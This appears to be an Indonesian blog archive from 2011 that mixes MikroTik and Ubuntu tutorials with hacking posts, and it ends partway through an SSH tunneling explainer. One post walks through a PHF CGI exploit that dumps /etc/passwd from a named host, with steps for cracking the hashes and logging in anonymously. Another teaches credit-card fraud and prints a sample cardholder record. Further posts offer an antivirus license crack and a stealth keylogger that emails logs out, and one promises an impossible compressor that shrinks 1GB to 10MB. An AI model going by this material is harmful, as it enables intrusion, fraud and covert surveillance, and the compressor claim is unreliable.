Hot Article

Kamis, 27 Januari 2011

Hotspot Manajemen with Mikrotik RouterOS 2.9.27

Mau buka RT/RW net? ato mo buat otorisasi dalam jaringan kamu?
kali ini saya buatin tutorial nya yang pake WINBOX, biar gampang..

Nih caranya mudah nya:

Buka IP - Hotspot, trus pada tab server click Setup


Pilih interface yang mo di buatin user manajemen nya, klo gw di sini pake Ether1


Masukin IP address interface itu:


Masukin pool ip-address untuk DHCP pool nya:


pilih sertificate kalo emang ada, gw si gak pake yg ginian, jd next aja:


Masukin SMTP server nya(kalo ada), gak ada? next aja:


masukin DNS yang dipake buat hotspot tsb:


tinggal next 1x lagi beres deh, double click hasil setup tadi sapa tau ada yang salah bisa di edit di sana:



Nah untuk user nya, pilih tab users trus masukin dah tuh user2 nya:



klo user nya banyak pake scrip aja, trus di run scrip nya, biar cepet. trus ntar tinggal di edit password nya:


Quote:
:for i from=1 to=50 do = { /ip hotspot user add server=Hotspot1 name=("user" . $i) password=("password" . $i) address=(192.168.0. .$i)}
NOTE:
Ini baru yang simple nya aja blom pake ARP ama Radius
trus kamu juga bisa rubah2 tampilan Login hotspot nya, coba deh pake ftp ke ip mikrotik nya. ada folder hotspot rubah2 deh tu sesuai selera...

Selamat mencoba n berkreasi...

---------------------------------------------------------------------------------------
untuk ke sekian x nya ,kalo ada yang salah mohon di koreksi, saya hanya manusia biasa..


Sofware Pengompress 1Gb menjadi 10Mb

Sungguh mengagumkan… Sebelumnya ane mau mintak izin terlebih dahulu, karena setelah membaca postingan ini mungkin sobat akan ternejut.. jut.. jut… hee!!! ane barusaja melakukan brousing dan menemukan sebuah software pengompres file yg
ukurannya tak lazim. Software pengompres Apa???

Mungkin sobat udah terbiasa mengompress file (menggunakan winRar atau yg lainnya) tetapi ini berbeda! Sungguh spektakuler software ini bisa mengompres file yg semula berkapasitas 1Gb bisa terkompres menyusut hingga berukuran 10Mb!!!! Tentu sobat bisa ngitung sendiri efisiensi yg bisa dilakukan oleh software pengompres ini.

Tanpa panjang lebar lagi (ntar malah dikira fitnah..) sekarang unduh dan buktikan sendiri. Kebetulan ane sudah memiliki software pengompres 1Gb menjadi 10Mb. Segera Download


Senin, 24 Januari 2011

Free SysInternals Suite 01.19.11 Download

SysInternals Suite 01.19.11

SysInternals Suite 01.19.11 | 13 MB

Sysinternals Troubleshooting Utilities have been rolled up into a single Suite of tools. This file contains more than 60 of the individual troubleshooting tools and help files. It does not contain non-troubleshooting tools like the BSOD Screen Saver or NotMyFault.


Some of the tools include:

* AccessChk
* AdExplorer
* Autoruns
* BgInfo
* DebugView
* Diskmon
* DiskView
* Filemon
* ListDlls
* LogonSessions
* ProcessExplorer
* ProcessMonitor
* ProcFeatures
* PsExec
* PsPasswd
* PsShutdown
* RegDelNull
* RegMon
* RootkitRevealer
* SDelete
* ShareEnum
* Sync
* TcpView
* VolumeId
* WhoIs
* WinObj
* ZoomIt
* Much more...
 


crak wifi

Wifi Connections are certainly very practical, but given that they require no wiring, everybody can be connected to it if his computer is compatible with Wifi.
WIFI Key Generator is a small application intended to generate random protection keys for your Wifi network. It can create keys of 64 to 256 bits. If your WLAN requests a key of 40 bits, generate a key of 64 bits. If it requests a key of 104 bits, generate a key of 128 bits.
The key can contain up to 63 characters, but you can let it choose for you.
Here is the conversion of characters to bits:
5 characters = 64bits key
13 characters = 128bits key
16 characters = 152bits key
9 characters = 256bits key.
donload here


Minggu, 23 Januari 2011

Daftar kumpulan repository ubuntu 10.4

mirror.cbn.net.id (OpenIXP)
deb http://ubuntu.cbn.net.id/Ubuntu lucid main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu lucid-updates main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu lucid-security main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu lucid-backports main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu lucid-proposed main restricted universe multiverse


kambing.ui.ac.id (UI, Telkom, Indosat, OpenIXP, INHERENT
deb http://kambing.ui.ac.id/ubuntu lucid main restricted universe multiverse
deb http://kambing.ui.ac.id/ubuntu lucid-updates main restricted universe multiverse
deb http://kambing.ui.ac.id/ubuntu lucid-security main restricted universe multiverse
deb http://kambing.ui.ac.id/ubuntu lucid-backports main restricted universe multiverse
deb http://kambing.ui.ac.id/ubuntu lucid-proposed main restricted universe multiverse


www.foss-id.web.id (Telkom)
deb http://dl2.foss-id.web.id/ubuntu lucid main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu lucid-updates main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu lucid-security main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu lucid-backports main restricted universe multiverse
deb http://dl2.foss-id.web.id/ubuntu lucid-proposed main restricted universe multiverse

ftp.itb.ac.id (ITB, INHERENT)
deb ftp://ftp.itb.ac.id/pub/ubuntu lucid main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu lucid-updates main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu lucid-security main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu lucid-backports main restricted universe multiverse
deb ftp://ftp.itb.ac.id/pub/ubuntu lucid-proposed main restricted universe multiverse

indika.net.id (OpenIXP)
deb http://ubuntu.indika.net.id/ lucid main restricted universe multiverse
deb http://ubuntu.indika.net.id/ lucid-updates main restricted universe multiverse
deb http://ubuntu.indika.net.id/ lucid-security main restricted universe multiverse
deb http://ubuntu.indika.net.id/ lucid-backports main restricted universe multiverse
deb http://ubuntu.indika.net.id/ lucid-proposed main restricted universe multiverse

kebo.vlsm.org
deb http://kebo.vlsm.org/ubuntu lucid main restricted universe multiverse
deb http://kebo.vlsm.org/ubuntu lucid-updates main restricted universe multiverse
deb http://kebo.vlsm.org/ubuntu lucid-security main restricted universe multiverse
deb http://kebo.vlsm.org/ubuntu lucid-backports main restricted universe multiverse
deb http://kebo.vlsm.org/ubuntu lucid-proposed main restricted universe multiverse
buaya.klas.or.id
deb http://buaya.klas.or.id/ubuntu/ lucid main restricted universe multiverse
deb http://buaya.klas.or.id/ubuntu/ lucid-updates main restricted universe multiverse
deb http://buaya.klas.or.id/ubuntu/ lucid-security main restricted universe multiverse

kavalinux.com (OpenIXP)
deb http://mirror.kavalinux.com/ubuntu/ lucid main restricted universe multiverse
deb http://mirror.kavalinux.com/ubuntu/ lucid-updates main restricted universe multiverse
deb http://mirror.kavalinux.com/ubuntu/ lucid-security main restricted universe multiverse
deb http://mirror.kavalinux.com/ubuntu/ lucid-backports main restricted universe multiverse
deb http://mirror.kavalinux.com/ubuntu/ lucid-proposed main restricted universe multiverse


Rabu, 19 Januari 2011

Masalah di Hospot Mikrotik

Pingin membuat jaringan internet dengan otorisasi login lewat http? Ikuti Langkah mudahnya
1.    Setup Hotspot Mikrotik
Paling mudah menurut saya bisa menggunakan Mikrotik, ada fasilitas IP – Hotspot. Hotspot disini tidak harus berupa WiFi, tetapi jaringnan kebel-pun bisa anda setup jadi seperti Hotspot. Setiap pengguna yang ingin login harus memasukan user/password ketika pertama kali browsing. Misal seperti tampil digambar berikut, misal pertama kali user yang akan mengakses situs tertentu akan di redirect ke halaman login.
Tampilan Login saat Browsing
Tampilan Login saat Browsing
Langkah mudah setup HOTSPOT Mikrotik :
1.    Pertama masuk ek router dengan WINBOX
Misal kita mempunyai 2 Interface :
Up yang ke Internet
LAN  yang ke LAN (akan disetup jadi Hotspot)
2.    Winbox : Pilih Menu IP -> Hotspot
3.    Hotspot : Pilih tab Server -> Hotspot Setup
4.    Selanjutnya Ikuti Langkah berikut :
Step By Step :
  1. Pilih ethernet
  2. Seting IP
  3. Seting DHCP IP pool (batasan IP untuk DHCP)
  4. Sertifikat (none saja)
  5. SMTP Biarkan 0.0.0.0 saja
  6. DNS sesuaikan dengan DNS anda, atau tanyakan ISP anda
  7. DNS name untuk Hotspot Anda, bisa juga anda Kosongi -> OK
Untuk IP, DNS silahkan sesuaikan dengan paramater IP yang ada di tempat anda.
2.    Menambah User baru
Menambah User baru seraca mudah bisa dilakukan dengan cara
Pilih : IP -> Hospot -> User -> +
Tulis Nama User dan Password
3.    Lebih jauh, Menambah User dengan Profil Berbeda
Dalam Mikrotik hospot memberikan kemudahan kita untuk men-setup user dengan profil yang berbeda, misalnya ada 2 profil user VIP dan Biasa. Dimana VIP bisa memperoleh kecepatan akses yang lebih dari user bisa, meskipun sama-sama menggunakan fasilitas hotspot. Dalam captur gambar saya membuat beberapa profil berbeda misalnya : Mahasiswa, Karyawan, Dosen, Pejabat dan Tamu. Nama dan setingan dari profil bisa anda tentukan sendiri. Akan saya coba tunjukan caranya, mensetup salah satu profil.
a. Setup profil dilakukan dengan cara :
Winbox         : IP -> Hotspot -> User Profil ->
Hotspot User Profil     : General -> Nama Profil (misal : Mahasiswa) -> Rate Limit (tx/rx) -> OK
Buat User profil mikrotik hotspot
Buat User profil mikrotik hotspot
Pada “Rate Limit” bisa anda isikan misal dengan beberapa cara (nilai bisa anda sesuaikan sesuai kebijakan IT ditempat anda ), misal :
1.    128 k         : Upload dan download 128 kbps
2.    256k/128k     : Uplaod 256kbps dan download 128 kbps
3.    x1k/y1k x2k/y2k x3k/y3k x5/y5 P x6k/y6k  -> Cara yang paling bagus Menurut saya.
x1k/y1k    : Rate (TX rate/ RX rate misal : 128k/1024k)
x2k/y2k    : Burst Rate (misal : 256k/2048k)
x3k/y3k    : Burst Threshold (misal : 160k/1280k)
x5/y5        : Burst Time (dalam detik misal : 60/60)
P                : Prioritas (nilai 1-8), 1 adalah prioritas utama
x6k/y6k    : Minimum rate: (i.e 32k/256k)
Untuk Cara yang ketiga bisa dilihat efeknya akan seperti gambar berikut :
Burst time dan Limit di Mikrotik
Burst time dan Limit di Mikrotik
b. Penambahan User baru
WINBOX     : IP -> User ->
Hotspot User
Name         : Isikan nama user
Password     : Password User
Profile        : Pilih profile dari user yang akan dibuat
OK dan Lihat hasilnya di List user yang ada.
4.    Modifikasi Halaman Login
Yang bisa anda lakukan untuk merubah tampilan Login adalah dengan memodifikasi file. Ambil file menggunakan FTP ke Mikrotik anda. Salah satu file yang bisa dimodifikasi adalah login.html sebelumnya saya sarankan untuk membackup dulu file tersebut sebelum melakukan perubahan. Setelah selesai anda bisa mengupload lagi dan mengecek, apakah sudah bekerja dengan benar atau belum. Selamat mencoba.
Informasi selengkapnya dengan Gambar yang lebih jelas bisa anda download disini +Hnc+


Kaspersky Blacklist Crack

Kaspersky Crack

Bagi pecinta AntiVirus Kaspersky, pasti sedikit risih dengan anti virus Kaspersky ini, karena Key yang selalu ter-Black List setelah Update, saya sendiri sudah malas untuk meng-update key kaspersky, karena cepat sekali ter-black list.

Untuk Kaspersky 2010 kebawah, kini sudah ada solusi dari masalah diatas yaitu dengan menggunakan crack AntiBlack List. Tetapi untuk Kaspersky 2011 belum dapat digunakan, jadi silakan menunggu dan gunakan key.

Penggunaan Crack ini sangat mudah, silakan anda buka kaspersky terlebih dahulu, kemudian klik setting, maka akan muncul jendela seperti dibawah ini.

Setting

Kemudian klik option pada menu di sebelah kiri, kemudian pada kotak Enable Self Defense silakan anda hilangkan tanda ceklist-nya, klik ok. kemudian silakan anda exit Kaspersky anda dengan klik kanan pada icon di system tray pilih exit.

Setelah kaspersky sudah tidak aktif, silakan anda jalankan "Kaspersky Blacklist Crack.exe" anda tinggal instal seperti biasa, jika sudah selesai, silakan anda jalankan kembali kaspersky, kemudian klik aktifkan dengan key yang saya berikan didalam satu folder AntiBlackList ini.

Silakan anda update kaspersky anda, dan anda tidak perlu khawatir lagi untuk masalah key Black List..

Baiklah untuk mendownload Kaspersky Blacklist Crack ini, silakan anda klik link download dibawah ini..

in hare


Minggu, 16 Januari 2011

Cara mendapatkan shell gratis tanpa beli.

perlu beberapa bahan yaitu:
1. Web browser (minimal 3.0)
2. Program cracker (gunakan crackerjack atau starcracker)
3. daftar kata (wordlist/dictionary) - GlobalKOS KOSdict - 11.2 MB
4. KOmputer umum

step:
1. buka 2 window
2. window yang 1, dipakai untuk membuka www.altavista.com/sk,
dengan keywordnya, host:ac.il) jika menginginkan host2 dari israel,
host:co.jp, jika menginginkan yang dari jepang. trus liat hasilnya
3. window yang ke 2, digunakan untuk mencari pasw dari host2 yang didapat
pada window 1, caranya dengan memasukan :
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

misalnya

http://eris.wisdom.weizmann.ac.il/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd

4. hasilnya kemungkinan ada 4.
1. error..message...(kalo udah ginian, maka harus kembali lagi ke awal...)
2. smile, you're on candid camera...( artinya, nomor ip kita direkam, dan disimpan diserver si target)
3. muncul tulisan: root:*0:0:SystemAdministrator:/:/bin/cshsysadm:*:1:1:BokephMemendez:/usr/adm:/bin/bash.

perhatikan bahwa setelah tanda titik dua yang pertama, selalu muncul tanda asteriks (*). ini artinya
kamu berhasil mendapatkan password hanya saja sayangnya sang fil sudah dishadow...harus ada
akses ROOT, terpaksa harus ke target berikutnya...

4. muncul tulisan: root:OUK9b8RqMRVNs:0:0:root,,,,:/:/bin/cshsysadm:*:0:0:system V administration:/usr/
admin:/bin/shdiag:*:0:996: HardwareDiagnostics:/usr/diags:/bin/csh Leonid:F5AymuqmXVFCU:1399:8:Leonid
Bebek:/usr/leonid:/bin/tcsh
(dalam kasus ini: langsung bisa dapat file passwd asli! tanpa shadow!!!)

5. segera setelahn menndapat file Passwd didapatkan, "save as" dan simpan
ditempat yang aman, terserah boleh kalo mau lanjut ke target berikut atau segra
mengcrack. patikan kom,puter untuk ngecrack aman dan bisa dibiarkan menganggur
selama berjam-jam atau kalo file passwdnya memang besar, bisa berhari-hari.
6. jalankan program crack, gunakan wordlist atas file passwd yang baru dipanen
7. kalo sudah berhasil ngecrack, kamu sudah siap untuk memakai shell unix baru.
8. telnet ke servernya, jangan lupa....gunakan komp umum, kalo pribadi....di phreak dulu.


(sumber, Anonymous)


Cara Carding

Pada blog kali ini saya akan menampilkan bagai mana cara Carding, artikel ini Saya ambil dari oasisnet.wordpress.com mungkin anda suda pernah lihat tapi demi pengetahuan dan sebagai flahs back, saya posting lagi.
Bagi yang ingin menambah ilmu bacalah blog ini. Disini akan di beritahukan apa itu Carding, bagaimana cara Carding, Dimana bisa mendapat kan nomer kartu kredit, dan trik mendapatkan nomer kartu kredit.
Agar tidak penasaran langsung aja kita bahas…..
Carding, sebuah ungkapan mengenai aktivitas berbelanja secara maya (lewat komputer), dengan menggunakan, berbagai macam alat pembayaran yang tidak sah. pada umumnya carding identik dengan transaksi kartu kredit, dan pada dasarnya kartu kredit yang digunakan bukan milik si carder tersebut akan tetapi milik orang lain.
apa yang terjadi ketika transaksi carding berlangsung, tentu saja sistem pembayaran setiap toko atau perusahaan yang menyediakan merchant pembayaran mengizinkan adanya transaksi tersebut. seorang carder tinggal menyetujui dengan cara bagaimana pembayaran tersebut di lakukan apakah dengan kartu kredit, wire transfer, phone bil atau lain sebagainya.
cara carding sebagai berikut:
1. mencari kartu kredit yang masih valid, hal ini dilakukan dengan mencuri atau kerjasama dengan orang-orang yang bekerja pada hotel atau toko-toko gede (biasanya kartu kredit orang asing yang disikat). atau masuk ke program MIRC (chatting) pada server dal net, kemudian ke channel #CC, #Carding, #indocarder, #Yogyacarding,dll. nah didalamnya kita dapat melakukan trade (istilah “tukar”) antar kartu kredit (bila kita memiliki kartu kredit juga, tapi jika tidak punya kartu kredit, maka dapat melakukan aktivitas “ripper” dengan menipu salah seorang yang memiliki kartu kredit yang masih valid).
2. setelah berhasil mendapatkan kartu kredit, maka carder dapat mencari situs-situs yang menjual produk-produk tertentu (biasanya di cari pada search engine). tentunya dengan mencoba terlebih dahulu (verify) kartu kredit tersebut di site-site porno (hal ini disebabkan karena kartu kredit tersebut tidak hanya dipakai oleh carder tersebut). jika di terima, maka kartu kredit tersebut dapat di belanjakan ke toko-toko tersebut.
3. cara memasukan informasi kartu kredit pada merchant pembayaran toko adalah dengan memasukan nama panggilan (nick name), atau nama palsu dari si carder, dan alamat aslinya. atau dengan mengisi alamat asli dan nama asli si empunya kartu kredit pada form billing dan alamat si carder pada shipping adress. (mudahkan?…..)
jenis kartu kredit:
1. asli didapatkan dari toko atau hotel (biasa disebut virgin CC)
2. hasil trade pada channel carding
3. hasil ekstrapolet (penggandaan, dengan menggunakan program C-master 4, cardpro, cardwizard, dll), softwarenya dapat di Download disini: Cmaster4, dan cchecker (jika ada yang ingin mengetahui CVV dari kartu tersebut)
4. hasil hack (biasa disebut dengan fresh cc), dengan menggunakan tekhnik jebol ASP (dapat anda lihat pada menu “hacking“)
Contoh kartu kredit:
First Name* Dody
Last Name* Kozzei
Address* 2057 Fries Mill Rd
City* Williamstown
State/Province* NJ
Zip* 08094
Phone* ( 856 )881-5692
E-mail* Dkozzei@koha.com
Payment Method Visa
Card Number 4046046044843491
Exp. Date 5/09

(Tapi kegiatan semacam ini merupakan tindakan kriminalitas)
Demikianlah salah satu Cara hacking yg mudah dilakukan oleh newbie....
artikel ini saya dapat dari slah satu site, tapi saya lupa namanya.....
...salam newbie...


Jumat, 14 Januari 2011

5 SOFTWARE GRATIS ANTI KEYLOGGER

Keylogger merupakan software yang biasa digunakan untuk memata-matai aktifitas yang dilakukan pada suatu komputer dengan cara merekam semua yang Anda ketikkan melalui keyboard dan menangkap tampilan layar (screen capture) program yang sedang Anda jalankan. Contohnya seperti ini, misalnya Anda mau login ke Facebook.com tentunya Anda harus memasukkan username (email) dan password terlebih dahulu.

Jika komputer yang Anda gunakan ternyata terdapat keylogger maka username dan password tersebut (yang Anda ketikkan lewat keyboard) akan direkam oleh keylogger. Biasanya keylogger akan mengirimkan data hasil “tangkapan” tersebut ke alamat email yang sudah ditentukan oleh si pemasang keylogger. Dengan begitu si pemasang keylogger dapat dengan mudah login ke akun Facebook Anda dengan menggunakan username dan password yang telah direkam tadi.

Itu baru akun facebook, belum misalnya Anda punya akun email, paypal, domain control panel, blog dan sebagainya. Semuanya bisa dicuri dengan bantuan keylogger.

Nah, untuk meminimalkan resiko karena keylogger tersebut, berikut ini kami pilihkan lima software anti keylogger yang bisa Anda gunakan secara gratis:

1. KeyScrambler Personal

KeyScrambler merupakan addon atau plugin untuk browser Firefox, Internet Explorer dan Flock. KeyScrambler akan mengenkripsi semua huruf yang Anda ketikkan, sehingga jika di komputer Anda ternyata ada software keylogger maka software keylogger tersebut hanya akan merekam hasil ketikan yang sudah terenkripsi.

Download: http://www.qfxsoftware.com/Download.htm

2. I Hate Keyloggers

I Hate Keyloggers merupakan software buatan Yohanes Aristianto. Software ini akan melindungi Anda dari key loggers, spyware, dan remote administration tools.

Download: http://dewasoft.com/privacy/i-hate-k...s.htm#download

3. PSMAntiKeyLogger

Software ini selain untuk melindungi komputer Anda dari keylogger, juga dapat untuk mencegah Screen/Form capturers.

Download: http://sourceforge.net/projects/psmantikeyloger/files/

4. SnoopFree Privacy Shield

SnoopFree Privacy Shield akan mencegah aktivitas perekaman tombol yang diketik, form yang dibuka dan screen capture yang biasa dilakukan oleh keylogger.

Download: http://www.snoopfree.com/PrivacyShield.htm

5. MyPlanetSoft Anti-Keylogger

MyPlanetSoft Anti-Keylogger merupakan salah satu software antikeylogger dengan ukuran file paling kecil, yaitu 36 kb.

Download: http://www.myplanetsoft.com/free/antikeylog.php


Blazing Tools Perfect Keylogger v1.7.5.0 Full


Perfect Keylogger adalah keylogger generasi baru yang tidak terdeteksi. Mekanisme internal yang kompleks tersembunyi dari pengguna di belakang friendly interface. Perfect Keylogger diterjemahkan ke dalam 20 bahasa dan semakin populer di seluruh dunia! Ini memungkinkan Anda merekam semua penekanan tombol, saat mereka dibuat dan aplikasi di mana mereka masuk.

Fitur:

•Dapat benar-benar tak terlihat, termasuk tembus pandang untuk firewall
•Visual surveilans (screenshot)
•Captures layar informasi pada setiap mouse klik
•Log teks yang diketik dalam setiap aplikasi
•Captures dari password di balik tanda bintang
•Captures dari klik tombol
•Website penebangan fitur
•AOL / ICQ / AIM / Yahoo chat penebangan
•Online kegiatan penyaringan
•Advanced kata kunci deteksi dan pemberitahuan
•Clipboard logging
•Mengirim log dan screenshot melalui e-mail dalam modus tersembunyi
•Stealth meng-upload log melalui FTP
•Remote instalasi / update / uninstall
•File log terenkripsi dan dapat dilindungi dengan sandi
•Monitoring semua pengguna PC, bahkan jika Anda tidak mengetahui password
•Mudah melihat log dan manajemen
•Ekspor log ke format HTML
•Kemungkinan untuk menentukan aplikasi target
•Mendukung semua versi Windows, termasuk Windows XP
•Sangat mudah digunakan

Cara Menggunakan BlazingTools Perfect Keylogger v1.7.5.0 :

1.Download dan instal BlazingTools Perfect Keylogger v1.7.5.0 (link download dibawah)
2.Klik kanan icon BlazingTools Perfect Keylogger v1.7.5.0 yang berada di system tray.
3.Klik Options
4.Beri centang "Run On Windows Start Up" (keylogger akan aktif dengan sendirinya bila komputer baru di jalankan)
5.Untuk kenyamanan dan keamanan, saya sarankan untuk mengganti tombol hotkey nya. (Digunakan untuk meng hiden/menampilakan icon keylogger)
6.Selesai
7.Untuk melihat rekaman nya, silhkan masuk ke "View The Log"
Download BlazingTools Perfect Keylogger v1.7.5.0 Full
Password Mediafire : www.remo-xp.com


Sebelum instal keylogger, harap disable dahulu Antivirus anda. Software BlazingTools Perfect Keylogger v1.7.5.0 ini sudah saya uji dan berjalan dengan baik. 100 % Tested n Worked By Me.
Cara Menggunakan BlazingTools Perfect Keylogger v1.7.5.0


Kupas Tuntas SSH Tunneling

SSH Tunneling adalah teknik yang wajib dikuasai hacker. Teknik ini sangat cocok dipakai sebagai backdoor dari  dunia luar langsung menembus ke dalam “behind enemy lines” melewati semua firewall, IDS, IPS atau apapun itu di perbatasan. Dalam artikel ini saya juga menjelaskan bagaimana melakukan chaining tunnel, yaitu menyambung tunnel dengan tunnel lain.
Apa itu Tunneling?
Secara sederhana tunneling berarti mengirimkan data melalui koneksi lain yang sudah terbentuk. Kalau anda buka situs internet banking, pasti anda akan membukanya dengan URL berawalan “https”, yang sejatinya adalah data dalam protokol HTTP yang dikirimkan melalui koneksi dengan protokol SSL, atau “HTTP over SSL”, dalam bahasa gaulnya berarti HTTP digendong sama SSL.
SSH dan SSL adalah dua contoh tunneling protocol, keduanya bisa dipakai untuk menggendong data dalam protokol apa saja (tidak hanya http). Hanya bedanya adalah pada SSL dibutuhkan public key certificate dalam format X.509 yang perlu diverifikasi melalui Certificate Authority resmi. SSH tidak memerlukan public key certificate, sehingga lebih sederhana dan lebih mudah dipakai.
Protocol Encapsulation
Dalam kasus https, data dalam protokol HTTP di-enkapsulasi (dibungkus) dalam protokol SSL sebagai payload. Enkapsulasi juga terjadi dalam layer model TCP/IP, yaitu data pada layer yang lebih atas menjadi payload dan di-enkapsulasi dengan protokol pada layer di bawahnya.
Anda tentu tahu boneka lucu terbuat dari kayu dari Rusia bernama Matryoshka. Keunikan boneka ini adalah boneka yang berukuran kecil bisa dimasukkan ke dalam boneka yang lebih besar, dan boneka yang lebih besar juga bisa dimasukkan ke dalam boneka yang lebih besar lagi hingga pada akhirnya hanya ada satu boneka saja yang paling besar. Bila boneka yang paling besar itu dibuka, maka di dalamnya akan ada satu boneka yang lebih kecil, bila boneka tersebut dibuka, maka akan ditemukan boneka lagi yang lebih kecil, demikian seterusnya hingga boneka yang terkecil.
Gambar di bawah ini sangat tepat menggambarkan apa itu protocol encapsulation.

Gambar di atas menggambarkan bagaimana data ketika dikirim dienkapsulasi dan dikirimkan melalui protokol yang berada pada layer di bawahnya. Pada gambar di atas bisa dikatakan bahwa email message tersebut dikirimkan dalam bentuk paket SMTP over TCP over IP over Ethernet. Jadi pada akhirnya semua data tersebut akan terkirim dalam bentuk paket ethernet.
Dalam ilustrasi boneka matryoshka, pesan email adalah boneka matryoshka terkecil. Boneka ini dimasukkan dalam boneka matryoshka SMTP yang ukurannya lebih besar, kemudian boneka matryoshka SMTP ini dimasukkan dalam boneka matryoshka TCP, kemudian boneka matryoshka TCP ini dimasukkan dalam boneka matryoshka IP, dan akhirnya dimasukkan ke dalam boneka matryoshka ethernet yang berukuran paling besar.
Jadi boneka matryoshka yang diterima lawan biacara adalah boneka matryoshka yang terbesar. Bila boneka ini dibuka, di dalamnya ada boneka Matryoshka IP yang lebih kecil, dan bila boneka ini juga dibuka, di dalamnya ada boneka matryoshka TCP yang semakin kecil ukurannya. Bila boneka matryoshka TCP ini dibuka, di dalamnya ada boneka matryoshka SMTP yang didalamnya ada matryoshka email message. Email message adalah boneka matryoshka terkecil.
Port Forwarding
Port forwarding atau port mapping pengalihan (redirection) koneksi dari suatu IP:Port ke IP:Port yang lain.  Ini artinya adalah semua koneksi yang ditujukan ke IP:Port asal akan dialihkan ke IP:Port tujuan seolah-olah client sedang menghubungi IP:Port tujuan secara langsung.
Contoh: bila kita definisikan port forwarding 127.0.0.1:8080 dipetakan ke 192.168.10.10:80, artinya bila browser di arahkan ke url http://127.0.0.1:8080, maka request HTTP tersebut akan diteruskan ke 192.168.10.10:80. Jadi walaupun pada localhost (127.0.0.1) port 8080 tidak ada web server, namun web browser bisa membuka web pada url http://localhost:8080.
Gambar di bawah ini adalah contoh port forwarding dari web nakahara-informatics.com.
Pada port forwarding tersebut, didefinisikan sehingga klien dari dunia luar bisa mengakses service yang ada pada jaringan internal. Port forwarding yang didefinisikan adalah:
  • 64.130.31.59:10004 –> 192.168.1.103:22
  • Artinya untuk SSH ke host 192.168.1.103, maka client harus ssh ke IP 64.130.31.59 port 10004.
  • 64.130.31.59:10001 –> 192.168.1.100:22
  • Artinya untuk SSH ke host 192.168.1.100, maka client harus ssh ke IP 64.130.31.59 port 10001.
  • 64.130.31.59:8080 –> 192.168.1.102:80
  • Artinya untuk mengakses halaman web di host 192.168.1.102, maka url yang harus dibuka di browser adalah http://64.130.31.59:8080
Port forwarding pada ssh, mirip dengan port forwarding pada gambar di atas, namun ada sedikit perbedaan. Pada port forward gambar di atas, titik koneksi masuk dan keluar sama, artinya koneksi masuk ke IP dan port tertentu, dan koneksi tersebut akan diforward ke tempat lain dari titik yang sama juga. Sedangkan port forwarding pada ssh, titik keluarnya berbeda dengan titik masuknya. Agar lebih jelas, silakan lihat gambar di bawah ini.
Pada gambar di atas pada bagian atas, koneksi yang masuk di titik masuk, diforward ke tujuan dari titik itu juga. Ini adalah tipikal port forwarding di router/proxy. Sedangkan pada gambar di bawahnya, koneksi yang masuk di titik masuk, diforward ke tujuan dari titik lain di ujung sebelah kanan. Kotak panjang yang menghubungkan dua titik berwarna oranye tersebut menggambarkan koneksi ssh. Koneksi yang masuk akan diforward dari ujung koneksi ssh, bukan dari titik masuknya.
Konsep SSH Tunneling
SSH adalah protokol yang multiguna, selain untuk menggantikan telnet, SSH juga mendukung fitur tunneling, port forwarding, download/upload file (Secure FTP), SOCKS proxy dsb. Semua fitur tersebut dibungkus dengan enkripsi sehingga data yang lewat melalui protokol ini aman dari jangkauan hacker.
Dalam ssh tunneling, data yang dikirimkan melalui koneksi ssh akan di-enkapsulasi (dibungkus) dalam paket SSH seperti pada gambar di bawah ini.
Selain enkapsulasi paket, dalam ssh tunnel juga dibutuhkan port forwarding. Port forwarding dalam SSH tunnel ada 3 jenis:
  • Local Port Forwarding
  • Remote Port Forwarding
  • Dynamic Port Forwarding
Perhatikan gambar di bawah ini untuk memahami perbedaan antara local port forwarding dan remote port forwarding.
Dari gambar di atas jelas terlihat bahwa perbedaan antara local dan remote port forwarding.
  • Pada local port forwarding, komputer yang bertindak sebagai ssh client akan menjadi titik masuk koneksi yang akan diforward dan komputer yang bertindak sebagai ssh server menjadi titik keluar. Jadi koneksi yang masuk ke titik masuk di komputer ssh client akan diforward ke tujuan dari komputer ssh server. Gambar di bawah ini ilustrasi lain dari ssh local port forwarding.

  • Pada remote port forwarding, komputer yang bertindak sebagai ssh server akan menjadi titik masuk koneksi yang akan diforward dan komputer yang bertindak sebagai ssh client menjadi titik keluar. Jadi koneksi yang masuk ke titik masuk di komputer ssh server akan diforward ke tujuan dari komputer ssh client. Gambar di bawah ini ilustrasi lain dari ssh remote port forwarding.
Jadi yang perlu diingat dalam perbedaan antara local dan remote port forwarding adalah posisi titik masuk koneksi yang akan diforward. Bila titik masuknya ada di komputer yang berperan sebagai ssh client, maka itu adalah local port forwarding, namun bila titik masuknya di komputer ssh server, maka itu adalah remote port forwarding.
Dalam bahasa sederhananya, disebut local karena dari sudut pandang ssh client, titik masuknya ada di localhost, dan disebut remote karena titik masuknya bukan di localhost, tapi di komputer ujung sana.
Static vs Dynamic Port Forwarding
Sebenarnya dynamic port forwarding termasuk local port forwarding juga karena pada dynamic port forwarding, titik masuk koneksi yang akan diforward berada di komputer yang berperan sebagai ssh client. Namun pada local dan remote port forwarding biasa (static), IP address dan port asal dan tujuan harus disetting dulu sebelum bisa dipakai, jadi sifatnya statis.
(static) local port forwarding
Gambar di atas adalah (static) local port forwarding biasa. Pada local port forwarding biasa (static), setiap pemetaan port asal dan IP:port tujuannya harus disetting satu per satu. Jadi terlihat pada gambar di atas, bila ada 3 tujuan yang ingin dihubungi, maka 3 pemetaan port asal dan IP:port tujuan harus disetting semua sebelum bisa dipakai.
Pada gambar di atas terlihat di ssh client ada 3 port yang LISTEN (3 bulatan merah di sisi ssh client)  untuk 3 tujuan yang berbeda. Perlu dicatat juga bahwa ketiga pemetaan port forwarding tersebut dilakukan di atas satu koneksi ssh yang sama (multiple port forwarding on single ssh conection).
dynamic (local) port forwarding
